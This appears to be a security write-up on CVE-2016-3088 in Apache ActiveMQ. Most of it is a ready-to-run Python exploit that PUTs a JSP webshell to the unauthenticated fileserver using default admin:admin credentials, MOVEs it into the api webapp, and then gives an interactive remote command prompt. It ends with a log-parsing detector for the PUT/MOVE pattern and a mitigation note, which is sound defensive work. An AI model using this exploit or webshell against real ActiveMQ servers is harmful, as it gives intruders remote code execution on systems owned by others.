CVE-2016-3088
1. Description
- Apache ActiveMQ 5.x ~ 5.14.0
- An arbitrary file upload vulnerability
- An arbitrary code execution vulnerability
- The ActiveMQ web console consists of three applications: admin, api and fileserver. admin is the administrator page, api is the interface, and fileserver is the interface for storing files. admin and api can only be used after logging in; fileserver requires no login.
2. Principle
- Upload a webshell with the PUT method
- MOVE the webshell into a directory that has execute permission, then execute it
3. EXP
- poc.py

```python
import requests

url_put = "http://192.168.76.138:8161/fileserver/{}.jsp"
filename = str(input("Please enter put filename:"))

# JSP that runs the "cmd" query parameter and echoes its output
data = '''<%@ page import="java.io.*" %>
<%
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
    int c;
    while ((c = in.read()) != -1) {
        out.print((char)c);
    }
    in.close();
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>
'''

headers_put = {
    "Authorization": "Basic YWRtaW46YWRtaW4="
}

# Step 1: PUT the file into fileserver (204 No Content means it was stored)
res_put = requests.put(url=url_put.format(filename), data=data, headers=headers_put)
if int(res_put.status_code) == 204:
    url_move = "http://192.168.76.138:8161/fileserver/{}.jsp"
    dst_file = "file:///opt/activemq/webapps/api/{}.jsp"
    headers_move = {
        "Destination": dst_file.format(filename),
        "Authorization": "Basic YWRtaW46YWRtaW4="
    }
    # Step 2: MOVE it into the api webapp, where JSP is executed
    res_move = requests.request(method='MOVE', url=url_move.format(filename), headers=headers_move, data=data)
    # original compared int(status_code == 204), which is always truthy; compare the code itself
    if res_move.status_code == 204:
        quit_input = True
        while quit_input:
            cmd = str(input("CVE-2016-3088 is exist!\nplease enter cmd:"))
            if cmd in ['q', 'quit', 'exit']:
                quit_input = False
                continue
            url_cmd = "http://192.168.76.138:8161/api/{}.jsp?cmd={}"
            res_cmd = requests.get(url=url_cmd.format(filename, cmd), headers=headers_put)
            print(res_cmd.text)
```
4. POC
- Connecting to that JSP backdoor with AntSword (中国蚁剑) gives a shell
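As an added defender-side example (not part of the original write-up), the PUT-then-MOVE chain from section 2 can be spotted in the web console's access log: the log lines and client IPs below are constructed, and the NCSA-style log format is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (NCSA style); not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /admin/ HTTP/1.1" 401 0
10.0.0.7 - - [10/Oct/2023:12:01:10 +0000] "PUT /fileserver/x.jsp HTTP/1.1" 204 0
10.0.0.7 - - [10/Oct/2023:12:01:12 +0000] "MOVE /fileserver/x.jsp HTTP/1.1" 204 0
10.0.0.7 - - [10/Oct/2023:12:01:20 +0000] "GET /api/x.jsp?cmd=id HTTP/1.1" 200 58
10.0.0.9 - - [10/Oct/2023:12:02:00 +0000] "GET /fileserver/readme.txt HTTP/1.1" 200 120
10.0.0.9 - - [10/Oct/2023:12:02:05 +0000] "PUT /fileserver/notes.txt HTTP/1.1" 204 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_requests(log_text):
    """Yield (ip, method, path, status) for each parseable line, in file order."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["ip"], m["method"], m["path"], int(m["status"])


def find_fileserver_abuse(log_text):
    """Flag clients that wrote to /fileserver/ and, worse, MOVEd what they had PUT.

    Returns {ip: {"writes": [paths], "put_then_move": [paths]}} for offending IPs only.
    A successful PUT followed by a MOVE of the same path from one client is the
    CVE-2016-3088 pattern; the MOVE Destination header is not in the access log,
    so the PUT/MOVE chain itself is the signal.
    """
    written = defaultdict(set)  # ip -> paths that client successfully PUT
    report = defaultdict(lambda: {"writes": [], "put_then_move": []})
    for ip, method, path, status in parse_requests(log_text):
        if not path.startswith("/fileserver/") or status >= 300:
            continue  # reads, other apps, and rejected requests are not writes
        if method == "PUT":
            written[ip].add(path)
            report[ip]["writes"].append(path)
        elif method == "MOVE":
            report[ip]["writes"].append(path)
            if path in written[ip]:
                report[ip]["put_then_move"].append(path)
    return dict(report)
```

Any write to /fileserver/ from an unexpected client deserves a look, since the page notes that fileserver needs no login; removing the fileserver WebAppContext from conf/jetty.xml closes the vector entirely.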